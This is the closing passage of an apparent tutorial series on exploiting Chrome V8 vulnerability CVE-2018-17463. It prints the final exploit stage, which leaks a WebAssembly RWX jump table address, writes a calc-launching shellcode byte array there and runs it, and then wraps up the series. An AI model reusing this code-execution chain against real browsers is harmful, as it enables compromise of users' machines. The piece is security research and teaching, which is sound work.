var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
var func = wasmInstance.exports.main;

// Leak WebAssembly Instance Address and Jump Table Start Pointer
print("[+] Leaking WebAssembly Instance Address...");
let wasmInstanceAddr = memory.addrOf(wasmInstance);
print(`[+] WebAssembly Instance Address @ 0x${wasmInstanceAddr.toString(16)}`);
let wasmRWXAddr = memory.read64(wasmInstanceAddr + 0xF0n);
print(`[+] WebAssembly RWX Jump Table Address @ 0x${wasmRWXAddr.toString(16)}`);

print("[+] Preparing Shellcode...");
// Prepare Calc Shellcode
let shellcode = new Uint8Array([0x48,0x31,0xff,0x48,0xf7,0xe7,0x65,0x48,0x8b,0x58,0x60,0x48,0x8b,0x5b,0x18,0x48,0x8b,0x5b,0x20,0x48,0x8b,0x1b,0x48,0x8b,0x1b,0x48,0x8b,0x5b,0x20,0x49,0x89,0xd8,0x8b,0x5b,0x3c,0x4c,0x01,0xc3,0x48,0x31,0xc9,0x66,0x81,0xc1,0xff,0x88,0x48,0xc1,0xe9,0x08,0x8b,0x14,0x0b,0x4c,0x01,0xc2,0x4d,0x31,0xd2,0x44,0x8b,0x52,0x1c,0x4d,0x01,0xc2,0x4d,0x31,0xdb,0x44,0x8b,0x5a,0x20,0x4d,0x01,0xc3,0x4d,0x31,0xe4,0x44,0x8b,0x62,0x24,0x4d,0x01,0xc4,0xeb,0x32,0x5b,0x59,0x48,0x31,0xc0,0x48,0x89,0xe2,0x51,0x48,0x8b,0x0c,0x24,0x48,0x31,0xff,0x41,0x8b,0x3c,0x83,0x4c,0x01,0xc7,0x48,0x89,0xd6,0xf3,0xa6,0x74,0x05,0x48,0xff,0xc0,0xeb,0xe6,0x59,0x66,0x41,0x8b,0x04,0x44,0x41,0x8b,0x04,0x82,0x4c,0x01,0xc0,0x53,0xc3,0x48,0x31,0xc9,0x80,0xc1,0x07,0x48,0xb8,0x0f,0xa8,0x96,0x91,0xba,0x87,0x9a,0x9c,0x48,0xf7,0xd0,0x48,0xc1,0xe8,0x08,0x50,0x51,0xe8,0xb0,0xff,0xff,0xff,0x49,0x89,0xc6,0x48,0x31,0xc9,0x48,0xf7,0xe1,0x50,0x48,0xb8,0x9c,0x9e,0x93,0x9c,0xd1,0x9a,0x87,0x9a,0x48,0xf7,0xd0,0x50,0x48,0x89,0xe1,0x48,0xff,0xc2,0x48,0x83,0xec,0x20,0x41,0xff,0xd6]);

print("[+] Writing Shellcode to Jump Table Address...");
// Write Shellcode to Jump Table Start Address
memory.write(wasmRWXAddr, shellcode);

// Execute our Shellcode
print("[+] Popping Calc...");
func();

It’s time to execute our exploit! If everything goes as planned, once the WebAssembly function gets called, it should execute our shellcode, and the calculator should pop up!

Alright, the moment of truth. Let’s see this bad boy in action!

And there we have it! Our exploit script works and we’re able to successfully execute our shellcode!

Closing

Well there we have it! After spending three months learning about Chrome and V8 internals, we were able to successfully analyze and exploit CVE-2018-17463! This was no small feat, as Chrome exploitation is a complex and challenging task.

Throughout the series, we have built a strong foundation of knowledge that has prepared us to tackle the more complex task of Chrome exploitation. At the end, we were able to successfully analyze and exploit a real-world vulnerability in Chrome, demonstrating the practical application of the concepts we have learned.

Overall, this series was written to provide a detailed and in-depth look at the world of Chrome exploitation, and I hope it has been both informative and useful for you, the reader. Whether you are a seasoned security researcher or just starting out, I hope you have gained valuable insights and knowledge from this series.

I want to sincerely thank you for sticking around to the end and for your interest in this topic!

With that being said, for those interested, the final exploit code for this project has been added to the CVE-2018-17463 repository on my GitHub.

Thank you for reading, cheers!

Kudos

I would like to sincerely thank V3ded for taking the time to do a thorough proofread of this post for accuracy and readability! Thank you!
